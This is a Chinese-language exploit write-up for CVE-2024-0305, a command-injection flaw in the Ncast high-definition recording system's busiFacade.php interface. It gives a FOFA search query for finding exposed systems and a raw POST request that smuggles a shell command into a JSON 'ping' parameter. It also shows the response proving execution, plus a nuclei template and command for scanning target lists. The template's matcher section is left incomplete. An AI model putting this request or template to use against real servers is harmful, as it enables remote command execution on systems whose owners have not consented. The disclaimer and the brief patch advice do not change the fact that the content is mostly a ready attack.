CVE-2024-0305

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

漏洞名称

Ncast盈可视高清智能录播系统busiFacade RCE漏洞

漏洞影响

Ncast盈可视

漏洞描述

Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统，旨在提供高质量，高清定制的录播功能。该系统/classes/common/busiFacade.php接口存在RCE漏洞，攻击者可以构造恶意命令远控服务器。

FOFA搜索语句

app="Ncast-产品" && title=="高清智能录播系统"

漏洞复现

向靶场发送如下数据包，执行echo hello命令

POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

响应内容如下，其中包含了hello关键词

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Date: Fri, 12 Jan 2024 05:41:32 GMT
Server: nginx/1.9.5
X-Powered-By: PHP/5.6.14

$#str#$hello

漏洞复现成功

nuclei poc

poc文件内容如下，在本地新建CVE-2024-0305.yaml文件，将内容粘贴进去即可

id: CVE-2024-0305

info:
  name: Ncast盈可视高清智能录播系统busiFacade RCE漏洞
  author: fgz
  severity: critical
  description: Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统，旨在提供高质量，高清定制的录播功能。该系统/classes/common/busiFacade.php接口存在RCE漏洞，攻击者可以构造恶意命令远控服务器。
  metadata:
    max-request: 1
    fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
    verified: true
requests:
  - raw:
      - |+
        POST /classes/common/busiFacade.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept: */*
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
        
        %7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20{{randstr}}%22%5D%7D

    matchers:
      - type: dsl
        dsl:

运行POC

nuclei.exe -l data/Ncast.txt -t mypoc/其他/CVE-2024-0305.yaml

修复建议

升级到最新版本或者缩减互联网攻击面。